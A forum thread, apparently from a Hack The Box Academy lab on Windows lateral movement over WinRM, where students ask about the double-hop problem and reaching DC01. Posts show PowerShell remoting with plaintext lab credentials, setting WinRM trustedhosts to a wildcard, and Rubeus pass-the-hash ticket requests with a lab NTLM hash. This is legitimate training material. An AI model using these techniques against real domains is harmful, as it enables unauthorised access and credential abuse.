Question About Windows Lateral Movement => Windows Remote Management (WinRM) => DC01 ( question 3)

HTB Content Academy
1

Hi , Everyone
I’am stuck at the question 3 to connect to DC01 with Leonvqz since 3 days.
I can connect or execute since SRV02 ( in evil-winrm or in RDP with WinRM with Rubeus with Leonvqz Hash) but il cannot execute any command with Leonvqz due to double-hop i can only use Invoke-Command with :

PS C:\Tools> $username = "INLANEFREIGHT\Helen"
PS C:\Tools> $password = "RedRiot88"
PS C:\Tools> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Tools> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
PS C:\Tools> Invoke-Command -ComputerName DC01 -Credential $credential -ScriptBlock { whoami; hostname }

Il also run this command in SRV02 :

Set-Item WSMan:localhost\client\trustedhosts -value * -Force

I’am connecting to SRV02 with evil-winrm with Hash of Leonvqz and also on RDP with Rubeus.exe for create TGT session but with the double hop in Winrm il cant use PSSession and i dont have credentials of Leonvqz.

I understand connexion for DC01 since SRV02 but I’am stuck , if someone can help

thank you very much

2

it’s ok i solved if you have any questions DM me

3

Hi @linuxoid92120 , I have a question .
i’m stuck at the 2nd question “Connect to the target machine using Helen’s Credentials, from there, use Leonvqz hash A35289033D176ABAAF6BEAA0AA681400 to connect to SRV02 and read the flag located at”.

my step by step:

  1. PS C:\Tools> $username = “INLANEFREIGHT\Helen”
  2. PS C:\Tools> $password = “RedRiot88”
  3. PS C:\Tools> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  4. PS C:\Tools> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
  5. PS C:\Tools> Enter-PSSession $sessionSRV02
  6. .\Rubeus.exe asktgt /user:leonvqz /rc4:3223DS033D176ABAAF6BEAA0AA681400 /nowrap

after that .\Rubeus.exe show me the following error:

[*] Action: Ask TGT

[] Got domain: inlanefreight.local
[] Using rc4_hmac hash: 3223DS033D176ABAAF6BEAA0AA681400
[*] Building AS-REQ (w/ preauth) for: ‘inlanefreight.local\leonvqz’

[!] Unhandled Rubeus exception:

System.FormatException: Additional non-parsable characters are at the end of the string.
at System.ParseNumbers.StringToInt(String s, Int32 radix, Int32 flags, Int32* currPos)
at System.Convert.ToByte(String value, Int32 fromBase)
at System.Linq.Enumerable.WhereSelectEnumerableIterator2.MoveNext() at System.Linq.Buffer1…ctor(IEnumerable1 source) at System.Linq.Enumerable.ToArray[TSource](IEnumerable1 source)
at Rubeus.PA_DATA…ctor(String keyString, KERB_ETYPE etype)
at Rubeus.AS_REQ…ctor(String keyString, KERB_ETYPE etype, Boolean opsec, Boolean pac)
at Rubeus.AS_REQ.NewASReq(String userName, String domain, String keyString, KERB_ETYPE etype, Boolean opsec, Boolean changepw, Boolean pac, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean opsec, String servicekey, Boolean changepw, Boolean pac, String proxyUrl, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Commands.Asktgt.Execute(Dictionary2 arguments) at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

can you help me?